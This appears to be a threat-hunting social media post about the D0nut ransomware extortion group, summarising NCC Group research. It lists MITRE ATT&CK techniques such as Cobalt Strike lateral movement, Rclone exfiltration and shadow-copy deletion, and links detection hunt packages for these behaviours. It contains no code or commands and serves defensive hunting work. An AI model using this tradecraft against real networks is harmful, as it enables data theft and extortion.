#HappyMonday everyone!
As promised, the next installation of a "Unveiling the Dark Side: A Deep Dive into Active Ransomware Families" from the NCC Group! This time they focus on the #D0nut extortion group who "demand ransoms in return for not leaking stolen data"(extortion) and then applying the double-extortion tactic where they exfiltrate the data THEN encrypt it. To add insult to injury they then demand ransom to decrypt AND to not leak the data. They use publicly available tools like #CobaltStrike to laterally move through the environment and Rclone to exfiltrate data. Plus, extra bonus points go to Ross Inman for the clever title! Enjoy and Happy Hunting!
D0nut encrypt me, I have a wife and no backups
https://research.nccgroup.com/2023/11/06/d0nut-encrypt-me-i-have-a-wife-and-no-backups/
Notable MITRE ATT&CK TTPs (credit again goes to the author):
TA0002 - Execution
T1569.002 - System Services: Service Execution (Both Cobalt Strike and PsExec)
TA0003 - Persistence
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
TA0004 - Privilege Escalation
T1055.002 - Process Injection: Portable Execution Injection
TA0005 - Defense Evasion
T1562.001 - Impair Defenses: Disable or Modify Tools
TA0008 - Lateral Movement
T1021.001 - Remote Services: Remote Desktop Protocol
TA0010 - Exfiltration
T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
TA0040 - Impact
T1490 - Inhibit System Recovery
T1486 - Data Encrypted for Impact
Some Cyborg Security Community Edition Hunt Packages to help you start your hunt for this type of activity:
Potential Exfiltration - Common Rclone Arguments
https://hunter.cyborgsecurity.io/research/hunt-package/f075c217-783e-459a-aeb4-42ea91e07af7
Shadow Copies Deletion Using Operating Systems Utilities
https://hunter.cyborgsecurity.io/research/hunt-package/2e3e9910-70c1-4822-804a-ee9919b0c419